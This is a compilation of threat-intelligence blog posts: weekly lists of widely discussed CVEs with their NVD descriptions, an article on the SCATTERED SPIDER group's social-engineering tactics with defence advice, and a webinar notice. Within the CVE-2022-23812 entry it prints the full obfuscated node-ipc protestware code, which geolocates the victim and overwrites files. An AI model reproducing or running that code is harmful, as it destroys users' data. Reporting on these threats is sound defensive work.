The SOS Intelligence CVE Chatter Weekly Top Ten – 16 June 2025

by Amir Hadzipasic

June 16, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2016-10033

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a ” (backslash double quote) in a crafted Sender property.

https://nvd.nist.gov/vuln/detail/CVE-2016-10033

2. CVE-2025-5287

The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘post’ parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2025-5287

3. CVE-2025-5419

Out of bounds read and write in V8 in Google Chrome prior to 137.0.7151.68 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-5419

4. CVE-2025-2783

Incorrect handle provided in unspecified circumstances in Mojo in Google Chrome on Windows prior to 134.0.6998.177 allowed a remote attacker to perform a sandbox escape via a malicious file. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-2783

5. CVE-2017-8759

Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka “.NET Framework Remote Code Execution Vulnerability.”

https://nvd.nist.gov/vuln/detail/CVE-2017-8759

6. CVE-2025-49113

Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.

https://nvd.nist.gov/vuln/detail/CVE-2025-49113

7. CVE-2024-21762

A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

8. CVE-2024-10687

The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to time-based SQL Injection via the $collectedIds parameter in all versions up to, and including, 24.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

9. CVE-2024-21060

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Data Dictionary). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

10. CVE-2025-5958

Use after free in Media in Google Chrome prior to 137.0.7151.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-5958

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 09 June 2025

by Amir Hadzipasic

June 9, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2025-48828

Certain vBulletin versions might allow attackers to execute arbitrary PHP code by abusing Template Conditionals in the template engine. By crafting template code in an alternative PHP function invocation syntax, such as the “var_dump”(“test”) syntax, attackers can bypass security checks and execute arbitrary PHP code, as exploited in the wild in May 2025.

https://nvd.nist.gov/vuln/detail/CVE-2025-48828

2. CVE-2025-48827

vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 allows unauthenticated users to invoke protected API controllers’ methods when running on PHP 8.1 or later, as demonstrated by the /api.php?method=protectedMethod pattern, as exploited in the wild in May 2025.

https://nvd.nist.gov/vuln/detail/CVE-2025-48827

3. CVE-2025-5287

https://nvd.nist.gov/vuln/detail/CVE-2025-5287

4. CVE-2025-5419

Out of bounds read and write in V8 in Google Chrome prior to 137.0.7151.68 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-5419

5. CVE-2025-2783

https://nvd.nist.gov/vuln/detail/CVE-2025-2783

6. CVE-2024-6409

A race condition vulnerability was discovered in how signals are handled by OpenSSH’s server (sshd). If a remote attacker does not authenticate within a set time period, then sshd’s SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). As a consequence of a successful attack, in the worst case scenario, an attacker may be able to perform a remote code execution (RCE) as an unprivileged user running the sshd server.

https://nvd.nist.gov/vuln/detail/CVE-2024-6409

7. CVE-2025-32433

Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.

https://nvd.nist.gov/vuln/detail/CVE-2025-32433

8. CVE-2024-21887

A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.

https://nvd.nist.gov/vuln/detail/CVE-2024-21887

9. CVE-2017-8759

https://nvd.nist.gov/vuln/detail/CVE-2017-8759

10. CVE-2025-5054

Race condition in Canonical apport up to and including 2.32.0 allows a local attacker to leak sensitive information via PID-reuse by leveraging namespaces.

When handling a crash, the function `_check_global_pid_and_forward`, which detects if the crashing process resided in a container, was being called before `consistency_checks`, which attempts to detect if the crashing process had been replaced. Because of this, if a process crashed and was quickly replaced with a containerized one, apport could be made to forward the core dump to the container, potentially leaking sensitive information. `consistency_checks` is now being called before `_check_global_pid_and_forward`. Additionally, given that the PID-reuse race condition cannot be reliably detected from userspace alone, crashes are only forwarded to containers if the kernel provided a pidfd, or if the crashing process was unprivileged (i.e., if dump mode == 1).

https://nvd.nist.gov/vuln/detail/CVE-2025-5054

Investigation, Opinion

Understanding SCATTERED SPIDER: Tactics, Targets, and Defence Strategies

by Daniel Collyer

June 4, 2025

In recent months, a wave of disruptive cyberattacks has swept across high-profile organisations in both the UK and the US, affecting sectors ranging from hospitality and telecommunications to finance and retail. Many of these incidents share a common thread: attribution to a threat actor known as SCATTERED SPIDER, a group now gaining notoriety for its aggressive use of social engineering and its partnership with the DragonForce ransomware-as-a-service (RaaS) operation.

Unlike traditional ransomware gangs that rely heavily on technical exploits or brute-force tactics, SCATTERED SPIDER stands out for its deeply manipulative approach. The group has repeatedly demonstrated its ability to impersonate employees, deceive IT support teams, and bypass multi-factor authentication (MFA) through cunning psychological tactics. Often described as “native English speakers,” they are suspected to operate in or have ties to Western countries, bringing a cultural fluency that makes their phishing and phone-based attacks alarmingly effective.

As law enforcement and cybersecurity professionals scramble to contain the fallout from recent attacks, one thing is clear: SCATTERED SPIDER is not just another ransomware affiliate. They represent a shift toward human-centric intrusion strategies, blending technical skill with social deception in a way that challenges even well-defended organisations.

This article takes a closer look at how SCATTERED SPIDER operates, the tools they use, including DragonForce RaaS and, most importantly, what practical steps individuals and organisations can take to reduce their exposure to this growing threat.

Image Credit: Crowdstrike

Who Is SCATTERED SPIDER?

SCATTERED SPIDER is the name given to a loosely affiliated cybercriminal group that has quickly gained attention for its highly targeted and persistent campaigns against major organisations. Believed to be active since at least 2022, the group is often classified as an Initial Access Broker (IAB) and affiliate actor, working both independently and in partnership with larger ransomware collectives, most notably the ALPHV/BlackCat operation.

What sets SCATTERED SPIDER apart is not just its technical acumen, but its expert use of social engineering, often executed in fluent English and with a level of cultural familiarity that suggests the group is likely based in or has strong ties to the US or UK. Unlike many ransomware actors operating out of Eastern Europe or Russia, SCATTERED SPIDER’s tactics are tailored to Western corporate environments, allowing them to convincingly impersonate staff, manipulate helpdesk personnel, and bypass traditional security barriers with unnerving ease.

The group’s motivation is primarily financial, but their techniques are unusually aggressive. Rather than simply deploying ransomware after gaining access, SCATTERED SPIDER takes the time to navigate internal systems, escalate privileges, and exfiltrate data, ensuring maximum impact and leverage during extortion. This has included threats to publicly leak sensitive data if ransoms aren’t paid, a tactic made easier by their ties to DragonForce RaaS, a ransomware service that offers data leak platforms and other tools to affiliates.

Notable incidents attributed to SCATTERED SPIDER include:

The 2023 attack on MGM Resorts, which saw large-scale IT disruption across casinos and hotels in the US, was reportedly caused by a simple phone-based social engineering ploy.
Intrusions into telecommunications and managed service providers, where they have targeted identity infrastructure such as Okta and Active Directory to pivot across networks.
Disruption and data theft in the financial and insurance sectors, where highly sensitive customer and operational data were exfiltrated and held to ransom.

These campaigns reveal a group that is not only technically capable but strategically manipulative, leveraging trust, urgency, and insider knowledge to achieve access that many automated tools would struggle to obtain.

The Tools of the Trade: DragonForce RaaS

One of the key enablers of SCATTERED SPIDER’s recent success has been their alignment with DragonForce, a relatively new entrant in the expanding Ransomware-as-a-Service (RaaS) ecosystem. RaaS models have radically altered the cybercrime landscape. Much like SaaS (Software-as-a-Service) in the legitimate tech world, RaaS lowers the barrier to entry for less technically capable threat actors by offering turnkey ransomware toolkits, user-friendly dashboards, and profit-sharing agreements between developers and affiliates.

What Is DragonForce?

DragonForce is a commercially operated ransomware platform, complete with a slick user interface, customer “support” channels, and marketing-style updates promoting new features and obfuscation techniques. While it may not yet have the brand recognition of LockBit or BlackCat, it is gaining traction among cybercriminal groups for its reliability, speed, and aggressive encryption routines.

Its offerings typically include:

Highly customisable payloads: Affiliates like SCATTERED SPIDER can tweak encryption settings, file extensions, and ransom notes to suit their targets.
Data exfiltration modules: These facilitate double extortion, where files are stolen before encryption and used as additional leverage during ransom negotiations.
Dark Web leak portals: Victim data is published or threatened with publication unless payment is made.
Access to a central control panel: Affiliates can monitor infected machines, initiate encryption manually, and track ransom payments via cryptocurrency wallets.

These features allow threat actors to operate more like cybercrime startups than ad-hoc hacking collectives.

Why SCATTERED SPIDER Uses DragonForce

SCATTERED SPIDER’s strength lies in gaining initial access, often via phone-based social engineering or SIM-swapping tactics, rather than building their own ransomware from scratch. By outsourcing encryption and extortion capabilities to a RaaS provider like DragonForce, they focus on what they do best: manipulating people, navigating corporate networks, and extracting sensitive data.

In this partnership, DragonForce gains a capable affiliate who can deliver high-value access, and SCATTERED SPIDER gains a ready-made suite of tools to monetise their intrusions. This division of labour reflects a broader shift in cybercrime, one where specialisation and scalability are the name of the game.

DragonForce and the RaaS Economy

It’s important to understand that DragonForce is not an isolated actor. It is part of a wider criminal ecosystem where:

Access brokers sell stolen credentials or remote access.
Malware developers lease out payloads to trusted affiliates.
Negotiators and money launderers offer “aftercare” services.

This ecosystem enables threat actors to operate like businesses, complete with hierarchical roles, profit-sharing models, and even internal dispute resolution mechanisms. In this context, SCATTERED SPIDER is not just a lone wolf but a well-placed operator within a highly coordinated cybercrime supply chain.

Why This Matters

The use of DragonForce by SCATTERED SPIDER highlights two alarming trends:

Professionalisation of ransomware: You no longer need deep technical knowledge to execute devastating attacks; just access, confidence, and a few phone calls.
Faster time-to-impact: With everything from encryption to extortion automated and streamlined, the time between compromise and ransom demand is shrinking rapidly, leaving organisations with little time to detect and respond.

As DragonForce continues to evolve and attract new affiliates, we are likely to see more actors adopt this model of rapid-access, rapid-extortion ransomware operations.

Image Credit: Kaspersky

Anatomy of an Attack: How SCATTERED SPIDER Operates

Understanding how SCATTERED SPIDER executes its attacks is crucial for organisations looking to strengthen their defences. Unlike many ransomware operators who rely on brute-force tactics or mass phishing campaigns, SCATTERED SPIDER favours precision, patience, and psychological manipulation.

Here’s a typical flow of operations observed in their campaigns:

1. Reconnaissance and Target Selection

The group begins by identifying high-value targets, often large enterprises in sectors such as telecommunications, financial services, and IT. They may purchase access to credentials or endpoint telemetry from Initial Access Brokers (IABs) or scrape publicly available information from LinkedIn, press releases, and social media to build detailed profiles of staff and infrastructure.

What makes this phase effective:

Use of OSINT to identify staff names, departments, and third-party vendors.
Focus on companies with complex IT environments and high tolerance for operational risk—prime candidates for extortion.

2. Initial Access via Social Engineering

Once they’ve identified the right entry point, SCATTERED SPIDER often deploys vishing (voice phishing) or phishing techniques to impersonate internal staff. In some cases, they call help desks pretending to be employees locked out of their accounts, requesting MFA resets or password changes.

This is where their native English and cultural familiarity give them a dangerous edge; they sound credible, confident, and urgent.

Common tactics:

Impersonating IT staff or executives to pressure support teams.
SIM-swapping or MFA fatigue attacks to intercept or bypass two-factor authentication.
Spoofed email domains or compromised inboxes used for internal-style phishing.

3. Credential Harvesting and Privilege Escalation

Once inside, the group moves quickly to extract further credentials. Tools such as Mimikatz, Cobalt Strike, and legitimate Windows administration tools (e.g. PowerShell, PsExec) are used to escalate privileges and move laterally across the network.

They specifically look for access to:

Identity infrastructure (Active Directory, Okta, Azure AD)
Remote access tools (VPNs, RDP gateways, Citrix)
Data repositories containing sensitive customer or business data

This phase may last hours or days, depending on the target’s size and the level of access achieved.

4. Data Exfiltration and Pre-Ransom Preparation

Before deploying ransomware, SCATTERED SPIDER usually exfiltrates a trove of sensitive data. This forms the basis of their double extortion strategy; even if a victim can restore from backups, they may still pay to prevent the public release of confidential files.

Common methods:

Compressing and uploading files to cloud storage services or attacker-controlled servers
Encrypting and staging data to avoid detection by DLP or antivirus tools

In some cases, the group leaves behind backdoors or admin accounts to retain long-term access or re-extort victims in the future.

5. Ransomware Deployment via DragonForce

Once exfiltration is complete and the environment is primed, SCATTERED SPIDER deploys DragonForce ransomware across the compromised network. The ransomware is configured to encrypt files rapidly and disrupt operations, sometimes including domain controllers and backup servers, to maximise impact.

Victims then receive a ransom note directing them to a Tor-based portal for negotiations. If payment isn’t made within a specified timeframe, stolen data is posted on a leak site associated with DragonForce.

Key Takeaways:

SCATTERED SPIDER relies on human error as much as technical vulnerabilities.
The group’s knowledge of Western IT environments makes it easier for them to blend in and manipulate systems and staff.
Their multi-stage attack chain: access, escalation, exfiltration, encryption, is methodical and difficult to detect in real time.

Image Credit – Reeds Solicitors

Why SCATTERED SPIDER’s Approach Is Especially Dangerous

SCATTERED SPIDER doesn’t operate like a traditional ransomware crew. Their campaigns combine social engineering finesse with technical aggression, resulting in a hybrid threat model that blends cybercrime with tactics more often associated with espionage groups. Here’s why they stand out and why they’re so difficult to defend against.

1. Deep Impersonation and Real-Time Manipulation

Unlike typical phishing groups that rely on mass email blasts, SCATTERED SPIDER employs live, targeted deception. Their operators speak fluent, unaccented English and are adept at impersonating IT personnel, executives, or employees in distress.

They frequently call help desks or IT support lines, using:

Personalised information gathered through OSINT
Spoofed phone numbers and internal-sounding email addresses
Calm, confident delivery to manipulate support staff in real time

This level of human-centred deception is rarely seen in conventional cybercrime campaigns and poses a serious challenge for security teams.

2. Precision Targeting of Identity Infrastructure

SCATTERED SPIDER understands that identity is the new perimeter. Rather than merely compromising a system, they aim to take control of identity and access management tools like:

Okta
Active Directory
Azure AD
SSO and MFA services

By doing so, they’re not just accessing individual endpoints, they’re taking over the core trust fabric of the organisation. Once they own your identity systems, lateral movement and persistence become trivially easy.

3. Speed and Aggression Outpacing Detection

While many attackers spend weeks in a network quietly collecting data, SCATTERED SPIDER moves with urgency and intent. In many cases:

Initial access to ransomware deployment can take place in less than 48 hours.
They bypass traditional controls using legitimate tools (Living off the Land), leaving minimal forensic traces.
They often disable security tools, delete logs, or backdoor admin accounts to stay one step ahead.

Traditional defences based on known signatures, blacklists, or passive monitoring are often too slow or too blind to respond in time.

4. Blurring the Line Between Cybercrime and Nation-State Tactics

Although motivated by financial gain rather than geopolitics, SCATTERED SPIDER’s tradecraft exhibits a level of maturity and adaptation more typical of state-sponsored APT groups. This includes:

Tailored intrusion techniques for specific industries and environments
Multi-stage attacks with operational patience
Use of multiple extortion channels, including PR pressure and data leak sites

This hybrid operational model: part ransomware gang, part APT, means traditional classifications don’t fully capture the scope of their threat. For defenders, this creates both strategic confusion and escalating risk.

In short, SCATTERED SPIDER is dangerous not just because of what they do, but how they do it. Their blend of psychological manipulation, identity compromise, and rapid escalation makes them one of the most formidable threats facing organisations today.

Defending Against SCATTERED SPIDER: Practical Guidance

While SCATTERED SPIDER’s tactics are sophisticated, they often exploit basic lapses in process, communication, and identity management. That means there are precautions organisations can take to harden themselves against this type of threat, without needing to reinvent their entire security stack.

1. Reinforce Help Desk Security Protocols

Since SCATTERED SPIDER frequently targets help desks and support teams, ensure those teams are trained to:

Never reset MFA or passwords without high-assurance identity verification.
Use call-back procedures or out-of-band verification for unusual requests.
Flag repeated or urgent requests as potential social engineering.

Adding simple checklists and mandatory escalation paths for sensitive account changes can drastically reduce social engineering success rates.

2. Harden Identity and Access Management

Identity remains a prime attack surface. To reduce risk:

Enforce phishing-resistant MFA, such as hardware tokens or app-based push authentication with device binding (rather than SMS or email codes).
Implement just-in-time access and least privilege policies for administrative accounts.
Regularly audit inactive accounts, especially third-party vendors and former employees.

Integrate identity telemetry into your detection stack: suspicious logins, MFA resets, or logins from new devices should trigger alerts.

3. Monitor for Signs of Lateral Movement

Once SCATTERED SPIDER is inside a network, time is of the essence. Deploy tools and strategies to detect:

Unusual use of remote admin tools (e.g. PowerShell, PsExec)
Use of credential dumping tools or abnormal privilege escalation
Lateral movement attempts, especially to identity infrastructure like Active Directory or Okta

EDR/XDR platforms with good behavioural analytics can be critical here, especially when coupled with 24/7 monitoring or MDR services.

4. Protect Your Data, and Know Where It Is

Given the group’s focus on data theft prior to encryption, prevention isn’t just about backups:

Map your critical data locations, especially customer, financial, and IP-related data.
Use Data Loss Prevention (DLP) tools to monitor exfiltration patterns.
Segment sensitive environments and restrict data access to only those who need it.

Ensure that backups are not just secure and segmented from your main network, but also tested regularly.

5. Prepare for the Human Side of a Crisis

Even strong technical controls can be undone by panic or poor decision-making in the moment. Prepare:

A ransomware playbook with clear response roles, legal guidance, and communications plans.
Crisis simulations or tabletop exercises that include scenarios involving data leaks and public extortion.
Training for executives and PR teams on how to manage the reputational and regulatory impact.

Remember: SCATTERED SPIDER succeeds by catching organisations off guard, so make sure your teams know exactly how to respond under pressure.

Security Culture Is Your Best Defence

At the end of the day, SCATTERED SPIDER’s tactics work because they exploit human trust, urgency, and complexity. Investing in detection tools is important, but fostering a culture of scepticism, verification, and shared responsibility across the organisation is what truly builds resilience.

Stay Vigilant, Stay Informed

SCATTERED SPIDER has proven that ransomware is no longer just about encrypted files and ransom notes — it’s about controlling identities, deceiving people, and outpacing traditional defences. Their campaigns demonstrate just how effective a threat actor can be when they combine technical proficiency with social engineering and real-time manipulation.

What makes them especially dangerous is not just the tools they use, but the tactics and mindset behind their operations. This is a group that studies its targets, adapts rapidly, and blends psychological and technical attacks with striking efficiency.

For organisations in the UK, the US, and beyond, the message is clear: security isn’t just a technology problem — it’s a people and process problem too. Preventing the next SCATTERED SPIDER-style breach means:

Educating and empowering support staff
Hardening identity infrastructure
Monitoring for the unexpected
And rehearsing how you’ll respond under pressure

Cybercriminals evolve constantly. So must we.

Header image > Photo by Егор Камелев on Unsplash.

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 02 June 2025

by Amir Hadzipasic

June 2, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2024-21762

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

2. CVE-2018-17144

Bitcoin Core 0.14.x before 0.14.3, 0.15.x before 0.15.2, and 0.16.x before 0.16.3 and Bitcoin Knots 0.14.x through 0.16.x before 0.16.3 allow a remote denial of service (application crash) exploitable by miners via duplicate input. An attacker can make bitcoind or Bitcoin-Qt crash.

https://nvd.nist.gov/vuln/detail/CVE-2018-17144

3. CVE-2024-10687

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

4. CVE-2024-21060

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

5. CVE-2025-3928

Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: “Webservers can be compromised through bad actors creating and executing webshells.” Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms. This vulnerability was added to the CISA Known Exploited Vulnerabilities (KEV) Catalog on 2025-04-28.

https://nvd.nist.gov/vuln/detail/CVE-2025-3928

6. CVE-2022-39260

Git is an open source, scalable, distributed revision control system. `git shell` is a restricted login shell that can be used to implement Git’s push/pull functionality via SSH. In versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4, the function that splits the command arguments into an array improperly uses an `int` to represent the number of entries in the array, allowing a malicious actor to intentionally overflow the return value, leading to arbitrary heap writes. Because the resulting array is then passed to `execv()`, it is possible to leverage this attack to gain remote code execution on a victim machine. Note that a victim must first allow access to `git shell` as a login shell in order to be vulnerable to this attack. This problem is patched in versions 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 and users are advised to upgrade to the latest version. Disabling `git shell` access via remote logins is a viable short-term workaround.

https://nvd.nist.gov/vuln/detail/CVE-2022-39260

7. CVE-2025-47577

Unrestricted Upload of File with Dangerous Type vulnerability in TemplateInvaders TI WooCommerce Wishlist allows Upload a Web Shell to a Web Server.This issue affects TI WooCommerce Wishlist: from n/a through 2.9.2.

https://nvd.nist.gov/vuln/detail/CVE-2025-47577

8. CVE-2023-51385

In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.

https://nvd.nist.gov/vuln/detail/CVE-2023-51385

9. CVE-2022-23812

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don’t run it! js import u from “path”; import a from “fs”; import o from “https”; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from(“aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=”, “base64”); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(“utf8”), function (t) { t.on(“data”, function (t) { const n = Buffer.from(“Li8=”, “base64”); const o = Buffer.from(“Li4v”, “base64”); const r = Buffer.from(“Li4vLi4v”, “base64”); const f = Buffer.from(“Lw==”, “base64”); const c = Buffer.from(“Y291bnRyeV9uYW1l”, “base64”); const e = Buffer.from(“cnVzc2lh”, “base64”); const i = Buffer.from(“YmVsYXJ1cw==”, “base64”); try { const s = JSON.parse(t.toString(“utf8”)); const u = s[c.toString(“utf8”)].toLowerCase(); const a = u.includes(e.toString(“utf8”)) || u.includes(i.toString(“utf8”)); // checks if country is Russia or Belarus if (a) { h(n.toString(“utf8”)); h(o.toString(“utf8”)); h(r.toString(“utf8”)); h(f.toString(“utf8”)); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = “”, o = “”) { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from(“4p2k77iP”, “base64”); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(…s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString(“utf8”), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };

https://nvd.nist.gov/vuln/detail/CVE-2022-23812

10. CVE-2025-31200

A memory corruption issue was addressed with improved bounds checking. This issue is fixed in tvOS 18.4.1, visionOS 2.4.1, iOS iOS 18.4.1 and iPadOS 18.4.1, macOS Sequoia 15.4.1. Processing an audio stream in a maliciously crafted media file may result in code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on iOS.

https://nvd.nist.gov/vuln/detail/CVE-2025-31200

CVE Top 10

The SOS Intelligence CVE Chatter Weekly Top Ten – 26 May 2025

by Amir Hadzipasic

May 26, 2025

This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.

There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.

We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.

If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2024-21762

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

2. CVE-2021-44228

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

3. CVE-2024-0418

A vulnerability has been found in iSharer and upRedSun File Sharing Wizard up to 1.5.0 and classified as problematic. This vulnerability affects unknown code of the component GET Request Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250438 is the identifier assigned to this vulnerability.

https://nvd.nist.gov/vuln/detail/CVE-2024-0418

4. CVE-2024-32593

Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPBits WPBITS Addons For Elementor Page Builder allows Stored XSS.This issue affects WPBITS Addons For Elementor Page Builder: from n/a through 1.3.4.2.

https://nvd.nist.gov/vuln/detail/CVE-2024-32593

5. CVE-2020-13951

Attackers can use public NetTest web service of Apache OpenMeetings 4.0.0-5.0.0 to organize denial of service attack.

https://nvd.nist.gov/vuln/detail/CVE-2020-13951

6. CVE-2024-32592

Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in VoidCoders, innovs Void Elementor WHMCS Elements For Elementor Page Builder allows Stored XSS.This issue affects Void Elementor WHMCS Elements For Elementor Page Builder: from n/a through 2.0.

https://nvd.nist.gov/vuln/detail/CVE-2024-32592

7. CVE-2021-40517

Airangel HSMX Gateway devices through 5.2.04 is vulnerable to stored Cross Site Scripting. XSS Payload is placed in the name column of the updates table using database access.

https://nvd.nist.gov/vuln/detail/CVE-2021-40517

8. CVE-2025-29927

Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.

https://nvd.nist.gov/vuln/detail/CVE-2025-29927

9. CVE-2024-21887

https://nvd.nist.gov/vuln/detail/CVE-2024-21887

10. CVE-2023-22515

Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances.

Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.

https://nvd.nist.gov/vuln/detail/CVE-2023-22515

SOS Intelligence Webinar

Business Update Webinar – you’re invited!

by Amir Hadzipasic

May 21, 2025

A date for your diaries, or rather, your calendar 🙂 Please join us on Wednesday, June 4th at 4pm UK time for our third webinar of the year where I will be taking you through our platform updates, and there are many!

Look forward to seeing you and taking your questions.

Best wishes,

Amir

Who is this for?

